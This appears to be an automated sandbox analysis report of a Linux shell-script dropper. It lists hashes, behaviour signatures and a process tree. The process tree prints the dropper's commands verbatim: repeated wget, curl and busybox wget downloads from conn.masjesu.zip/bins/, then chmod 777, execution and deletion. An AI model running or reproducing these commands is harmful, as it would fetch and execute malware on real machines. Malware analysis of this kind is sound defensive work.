Analysis
-
max time kernel
103s -
max time network
105s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:12
Static task
static1
Behavioral task
behavioral1
Sample
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
-
Size
10KB
-
MD5
f36cbd463f4b21236b1338c03dbfd8e4
-
SHA1
22a27ede29be8ec1c42b17c43a162e2d9ab3a265
-
SHA256
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912
-
SHA512
74f54cf55aaa5b35951ff883a64e3a584f03c6952de36b92558993d20093f641c9f3aab6c7d659cef4c8c0cf84b8762f370d1ed768b48d717f130bd7f6f91e9a
-
SSDEEP
96:Yqin/wN/wN/w7vQ4vxL1VMQWGmXr87XnNHNbNk3WKJUIEBL7XMWxWpWhC+kacagk:C6eET5AQtxk3vJ+tqkotxk3vb36eETGB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 858 chmod 959 chmod 973 chmod 980 chmod 844 chmod 868 chmod 994 chmod 783 chmod 889 chmod 966 chmod 1015 chmod 910 chmod 924 chmod 945 chmod 882 chmod 903 chmod 917 chmod 938 chmod 987 chmod 1001 chmod 851 chmod 952 chmod 800 chmod 813 chmod 875 chmod 896 chmod 931 chmod 1008 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH 785 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h 801 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM 814 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd 845 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM 852 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI 859 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG 869 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B 876 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg 883 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj 890 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy 897 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc 904 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 911 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw 918 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd 925 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM 932 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI 939 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG 946 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj 953 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy 960 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc 967 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 974 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B 981 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg 988 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw 995 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH 1002 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h 1009 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM 1016 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 804 curl 850 busybox 881 busybox 893 curl 895 busybox 937 busybox 941 wget 779 busybox 963 curl 986 busybox 998 curl 1012 curl 949 curl 902 busybox 942 curl 948 wget 958 busybox 871 wget 857 busybox 956 curl 842 busybox 900 curl 923 busybox 927 wget 984 curl 991 curl 847 wget 874 busybox 969 wget 997 wget 865 curl 867 busybox 885 wget 886 curl 899 wget 934 wget 1014 busybox 803 wget 848 curl 872 curl 930 busybox 935 curl 955 wget 962 wget 827 curl 799 busybox 809 busybox 906 wget 916 busybox 720 wget 965 busybox 979 busybox 1007 busybox 892 wget 914 curl 1000 busybox 1004 wget 909 busybox 970 curl 771 curl 855 curl 878 wget 928 curl 951 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h curl File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG curl File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd curl File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM curl File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM curl File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy curl File opened for modification /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG curl File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj curl File opened for modification /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw curl File opened for modification /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy curl File opened for modification /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw curl File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH curl File opened for modification /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM curl File opened for modification /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 curl File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B curl File opened for modification /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH curl File opened for modification /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd curl File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc curl File opened for modification /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h curl File opened for modification /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj curl File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI curl File opened for modification /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B curl File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg curl File opened for modification /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM curl File opened for modification /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI curl File opened for modification /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc curl File opened for modification /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 curl File opened for modification /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg curl
Processes
-
/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh1⤵PID:715
-
/bin/rm/bin/rm bins.sh2⤵PID:717
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- System Network Configuration Discovery
PID:720
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- System Network Configuration Discovery
PID:779
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:790
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- System Network Configuration Discovery
PID:799
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:802
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:817
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:818
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- System Network Configuration Discovery
PID:842
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- System Network Configuration Discovery
PID:847
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- System Network Configuration Discovery
PID:850
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:853
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:854
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- System Network Configuration Discovery
PID:857
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:861
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- System Network Configuration Discovery
PID:867
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- System Network Configuration Discovery
PID:881
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- System Network Configuration Discovery
PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:888
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:905
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- System Network Configuration Discovery
PID:909
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:912
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:913
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- System Network Configuration Discovery
PID:916
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:919
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:920
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- System Network Configuration Discovery
PID:923
-
-
/bin/chmodchmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd2⤵PID:926
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- System Network Configuration Discovery
PID:927
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI2⤵PID:940
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:944
-
-
/bin/chmodchmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG2⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
